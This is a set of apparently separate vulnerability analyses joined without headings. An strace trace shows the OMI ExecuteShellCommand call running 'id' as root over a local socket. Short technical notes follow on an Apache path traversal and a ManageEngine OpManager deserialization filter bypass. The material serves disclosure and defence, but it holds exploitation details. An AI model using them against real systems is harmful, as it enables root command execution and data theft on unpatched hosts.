root@3ad6908bf1bc:/opt/omi/bin# strace -v -f -xx -e trace=socket,connect,write,writev,close /opt/omi/bin/omicli iv root/scx { SCX_OperatingSystem } ExecuteShellCommand { command 'id' timeout 0 } ... [pid 1271] socket(AF_UNIX, SOCK_STREAM, 0) = 6 [pid 1271] connect(6, {sa_family=AF_UNIX, sun_path="\x2f\x76\x61\x72\x2f\x6f\x70\x74\x2f\x6f\x6d\x69\x2f\x72\x75\x6e\x2f\x6f\x6d\x69\x73\x65\x72\x76\x65\x72\x2e\x73\x6f\x63\x6b"}, 110) = 0 [pid 1271] writev(6, [{iov_base="\x2f\x7e\xa8\xb1\x08\x06\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x08\xd5\x83\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"..., iov_len=48}, {iov_base="\xd8\xd5\x83\x01\x00\x00\x00\x00\xd0\xd8\x83\x01\x00\x00\x00\x00\xd0\xd4\x83\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"..., iov_len=248}], 2) = 296 [pid 1271] write(5, "\x00\x00\x00\x00\x00\x00\x00\x00", 8) = 8 [pid 1271] close(7) = 0 [pid 1272] writev(6, [{iov_base="\x2f\x7e\xa8\xb1\x08\x06\x01\x00\x00\x00\x00\x00\x05\x00\x00\x00\x88\x33\x83\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"..., iov_len=112}, {iov_base="\x57\x99\x2b\x46\x01\x00\x00\x00\x0f\x00\x00\x00\x5f\x4f\x4d\x49\x5f\x4f\x70\x74\x69\x6f\x6e\x53\x65\x74\x00\x00\x00\x00\x00\x00"..., iov_len=188}, {iov_base="\x60\xea\x6a\xb2\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xa0\x0b\x61\x57\x46\x7f\x00\x00\xe8\x34\x83\x01\x00\x00\x00\x00"..., iov_len=80}, {iov_base="\x60\xea\x6a\xb2\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xa0\x0b\x61\x57\x46\x7f\x00\x00\xe8\x34\x83\x01\x00\x00\x00\x00"..., iov_len=1360}, {iov_base="\x57\x99\x2b\x46\x02\x00\x00\x00\x14\x00\x00\x00\x53\x43\x58\x5f\x4f\x70\x65\x72\x61\x74\x69\x6e\x67\x53\x79\x73\x74\x65\x6d\x00"..., iov_len=108}, {iov_base="\xd0\x86\x83\x01\x00\x00\x00\x00\x70\x8a\x83\x01\x00\x00\x00\x00\x80\x8a\x83\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00"..., iov_len=1008}], 6) = 2856 [pid 1272] write(1, "\x69\x6e\x73\x74\x61\x6e\x63\x65\x20\x6f\x66\x20\x45\x78\x65\x63\x75\x74\x65\x53\x68\x65\x6c\x6c\x43\x6f\x6d\x6d\x61\x6e\x64\x0a", 32instance of ExecuteShellCommand ) = 32 [pid 1272] write(1, "\x7b\x0a", 2{ ) = 2 [pid 1272] write(1, "\x20\x20\x20\x20\x52\x65\x74\x75\x72\x6e\x56\x61\x6c\x75\x65\x3d\x74\x72\x75\x65\x0a", 21 ReturnValue=true ) = 21 [pid 1272] write(1, "\x20\x20\x20\x20\x52\x65\x74\x75\x72\x6e\x43\x6f\x64\x65\x3d\x30\x0a", 17 ReturnCode=0 ) = 17 [pid 1272] write(1, "\x20\x20\x20\x20\x53\x74\x64\x4f\x75\x74\x3d\x75\x69\x64\x3d\x30\x28\x72\x6f\x6f\x74\x29\x20\x67\x69\x64\x3d\x30\x28\x72\x6f\x6f"..., 50 StdOut=uid=0(root) gid=0(root) groups=0(root) ) = 50 [pid 1272] write(1, "\x0a", 1 ) = 1 [pid 1272] write(1, "\x20\x20\x20\x20\x53\x74\x64\x45\x72\x72\x3d\x0a", 12 StdErr= ) = 12 [pid 1272] write(1, "\x7d\x0a", 2} ) = 2 [pid 1271] write(5, "\x00\x00\x00\x00\x00\x00\x00\x00", 8) = 8 [pid 1272] close(6) = 0 ... +++ exited with 0 +++
By following the writev
calls, the standard exchange can be viewed. The frames starting with \x2f\x7e\xa8\xb1
are header frames. All of the data sent as part of the first request can be omitted, leaving the second which contains the command to execute within the binary structure. The results of the operating system command can be read from the socket, though they must be extracted from the binary response. The commands are executed within the context of a subshell.
This vulnerability can be exploited in the default configuration and was patched in version 1.6.8-1 which was released on September 8th 2021.
Technical Analysis
Apache doesn’t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.
There will likely be evidence within the Apache access logs of exploitation. Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.
Technical Analysis
The com.adventnet.me.itom.framework.ITOMObjectInputStream
is a class that was added to fix the serialization issue originally disclosed in CVE-2020-28653. It’s located in the OpManagerServerClasses.jar
file. It works by overriding the resolveClass
method and using a boolean state variable classResolved
. When the object is initialized, the caller must call setClassName
to add the names of one or more classes that are allowed to be deserialized. The classResolved
state variable is initialized to false, and when a class is resolved if it’s name is in the list of allowed classes, it’s set to true and resolving carries on as usual. If no allowed classes are defined, or the class name that is being deserialized is not in the allowed list, an exception is thrown.
A flaw exists in this implementation whereby if a single ITOMObjectInputStream
instance is used for multiple readObject
calls, then only the first will be protected because the classResolved
state variable will persist into subsequent calls. This means a vulnerable use of this class would initialize it and then use the same instance for 2 or more readObject
calls. The first object must be of the expected type, but any after that can be used for malicious deserialization purposes.
Such a vulnerable invocations is present in the com.adventnet.tools.sum.server.session.SUMServerIOAndDataAnalyzer
class’s process
method. This class is located in the AdventNetSUMServer.jar
file. It can be accessed by sending a serialized SUMPDU object with an OPEN_SESSION
request (see SUMHttpRequestHandler.processSumPDU
). This will cause SUMServerIOAndDataAnalyzer
to be initialized as the socket client. Once initialized, the data field of serialized SUMPDU object will be passed to the SUMServerIOAndDataAnalyzer.process
method where the vulnerable serialization operations can occur.